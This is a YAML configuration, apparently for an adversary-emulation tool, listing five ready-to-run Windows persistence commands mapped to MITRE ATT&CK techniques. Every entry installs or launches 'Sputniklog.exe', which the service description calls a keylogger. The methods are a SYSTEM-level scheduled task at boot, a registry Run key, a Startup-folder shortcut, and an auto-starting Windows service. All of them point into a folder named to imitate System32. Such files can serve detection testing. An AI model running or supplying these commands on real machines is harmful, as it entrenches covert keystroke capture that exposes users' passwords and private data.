paths:
  baseFolder: "C:\\System34"
  outputFolder: "C:\\System34\\Persistence"
  SummaryFolder: "C:\\System34\\Summary"

commands:
  # Persistence     - Total Commands : 5
  # Last Modified   - May 8 2025 
  
  - technique: "T1053.005 - Scheduled Task/Job: Scheduled Task"
    command: >-
      Start-Process -Verb RunAs cmd.exe -ArgumentList '/c schtasks /create /tn "SputnikLogServiceTask" /tr "C:\\System34\\Persistence\\Sputniklog.exe" /sc ONSTART /RU SYSTEM /RL HIGHEST'
    executor: "powershell"
    file_name: "Create_Scheduled_Task"

  - technique: "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
    command: >-
      Start-Process -Verb RunAs cmd.exe -ArgumentList '/c reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "SputniklogService" /t REG_SZ /d "C:\\System34\\Persistence\\Sputniklog.exe" /f'
    executor: "powershell"
    file_name: "Registry_RunKey"

  - technique: "T1547.001 - Startup Folder Shortcut"
    command: >-
      $wshShell = New-Object -ComObject WScript.Shell;
      $shortcut = $wshShell.CreateShortcut("C:\\Users\\$env:USERNAME\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SputniklogService.lnk");
      $shortcut.TargetPath = "C:\\System34\\Persistence\\Sputniklog.exe";
      $shortcut.Save();
    executor: "powershell"
    file_name: "Startup_Folder_Shortcut"

  - technique: "T1543.003 - Create or Modify System Process: Windows Service"
    command: >-
      Start-Process -Verb RunAs powershell -ArgumentList '-Command "New-Service -Name SputniklogService -BinaryPathName `"C:\\System34\\Persistence\\Sputniklog.exe`" -DisplayName `"Sputnik Log Service`" -Description `"A service that runs Sputniklog keylogger.`" -StartupType Automatic"'
    executor: "powershell"
    file_name: "Create_Windows_Service"

  - technique: "T1543.003 - Start Windows Service"
    command: >-
      Start-Process -Verb RunAs powershell -ArgumentList '-Command "Start-Service -Name SputniklogService"'
    executor: "powershell"
    file_name: "Start_Windows_Service"
